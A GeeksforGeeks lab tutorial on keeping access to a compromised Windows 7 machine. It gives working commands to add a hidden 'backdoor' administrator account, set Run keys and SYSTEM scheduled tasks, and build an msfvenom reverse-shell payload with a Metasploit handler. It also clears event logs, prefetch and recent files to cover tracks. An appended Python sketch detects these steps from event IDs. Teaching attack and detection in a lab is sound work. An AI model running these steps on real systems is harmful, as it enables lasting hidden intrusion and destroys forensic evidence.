URL: https://www.geeksforgeeks.org/ethical-hacking/maintaining-access-in-privilege-escalation/

Maintaining Access in Privilege Escalation

Last Updated : 26 Aug, 2025

Privilege escalation allows an attacker to gain SYSTEM (Windows) or root (Linux) access. But a one-time shell isn't enough: if the system reboots, the session drops, or defenders remove you, you lose control. Maintaining access provides persistence so we don't need to exploit again. It ensures you can:

  • Re-enter the system without repeating exploitation.
  • Stay hidden while persisting in the background.
  • Cover your tracks to avoid detection.

In this lab, we'll use Metasploit, Meterpreter, and manual techniques to add persistence and cover our tracks.

Learning Outcome

  • Adding users & backdoors for persistence.
  • Using Metasploit persistence module.
  • Proving re-entry after reboot (maintaining access).
  • Covering tracks to remain hidden.

Adding Users for Persistence

Create a hidden admin account to log back in.

net user backdoor Pass@123 /add
net localgroup administrators backdoor /add

You can verify it with:

net user backdoor
๐Ÿ‘ add_user_backdoor

Registry Keys for Persistence

This launches the payload automatically on startup.

  • To create a registry key that automatically runs backdoor.exe on startup, enter this in the shell:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v updater /t REG_SZ /d "C:\backdoor.exe"

After reboot, backdoor.exe will run automatically.

Persistence using msfvenom

  • First, create the payload in Kali:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 -f exe > backdoor.exe
  • Upload this file using Meterpreter (when exiting, use Ctrl+Z so the session is kept):
upload backdoor.exe C:\\backdoor.exe
  • Create a scheduled task from the Windows shell:
schtasks /create /tn "Updater" /tr "C:\backdoor.exe" /sc onlogon /ru SYSTEM

Reverse Shell Persistence using Metasploit

This creates a reverse shell session every time the computer is rebooted. In Meterpreter, use this module:

use exploit/windows/local/persistence
set SESSION 1
set LHOST 192.168.56.102
set LPORT 4444
set STARTUP SYSTEM
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
  • Before running exploit, set up a handler (the listener) in another Kali terminal:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
set LPORT 4444
run
  • Reboot the Windows 7 machine.
  • After reboot, the victim should automatically reconnect to your handler, giving you a new Meterpreter session.
๐Ÿ‘ persistence_exploit_listener

Covering Tracks

Once persistence is achieved, the attacker's next step is to hide their presence. Covering tracks is crucial because defenders often investigate event logs, user history, and suspicious files to detect compromise.

  • Clear event logs: attackers often remove these to prevent defenders from tracing their activity.
wevtutil cl Security
wevtutil cl Application
wevtutil cl System
  • Or clear all event logs directly from a Meterpreter session:
clearev
  • Clear user history: Windows stores cached and recently executed files, which can reveal attacker activity. Delete the Prefetch files:
del C:\Windows\Prefetch\*.*

Other useful deletions

  • Clear temporary files:
del %temp%\*.* /s /q
  • Clear recently opened files:
del C:\Users\<User>\Recent\*.* /q
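
Detection view of the lab, as an added example that is not part of the original article: each persistence step above leaves a Windows event behind, and clearing a log writes its own record (Security 1102, System 104), so forwarded copies still show the sequence. The Python sketch below triages constructed sample events as a log collector would hold them. The event tuples, rule labels and function names are assumptions for illustration; event 13 assumes Sysmon is installed with registry monitoring, and event 4698 assumes object-access auditing is enabled.

```python
import re

# Constructed sample events (channel, event ID, message), as a log collector
# might hold them after forwarding. Illustrative only, not real log output.
SYSMON = "Microsoft-Windows-Sysmon/Operational"
SAMPLE_EVENTS = [
    ("Security", 4720, "A user account was created. Account Name: backdoor"),
    ("Security", 4732, "A member was added to a security-enabled local group. Group: Administrators"),
    ("Security", 4732, "A member was added to a security-enabled local group. Group: Users"),
    (SYSMON, 13, r"TargetObject: HKU\S-1-5-21-0\Software\Microsoft\Windows\CurrentVersion\Run\updater"),
    ("Security", 4698, r"A scheduled task was created. Task Name: \Updater"),
    ("Security", 4624, "An account was successfully logged on."),
    ("Security", 1102, "The audit log was cleared."),
    ("System", 104, "The Application log file was cleared."),
]

# (channel, event ID) -> (finding label, optional filter on the message text)
RULES = {
    ("Security", 4720): ("local account created", None),
    ("Security", 4732): ("member added to Administrators", re.compile(r"\bAdministrators\b", re.I)),
    ("Security", 4698): ("scheduled task created", None),  # needs object-access auditing
    (SYSMON, 13): ("Run key value set", re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)),
    ("Security", 1102): ("Security log cleared", None),
    ("System", 104): ("event log cleared", None),
}

def triage(events):
    """Return (index, label) for every event that matches a rule."""
    findings = []
    for i, (channel, event_id, message) in enumerate(events):
        rule = RULES.get((channel, event_id))
        if rule and (rule[1] is None or rule[1].search(message)):
            findings.append((i, rule[0]))
    return findings

def cleared_after_persistence(findings):
    """True when a log-clear finding follows an earlier persistence finding."""
    seen_persistence = False
    for _, label in findings:
        if label.endswith("cleared"):
            if seen_persistence:
                return True
        else:
            seen_persistence = True
    return False

if __name__ == "__main__":
    for index, label in triage(SAMPLE_EVENTS):
        print(index, label)
```

A log-clear event that follows account, Run key or task creation on the same host is a stronger signal than any of those events alone, which is why logs should be forwarded off the host before they can be cleared locally.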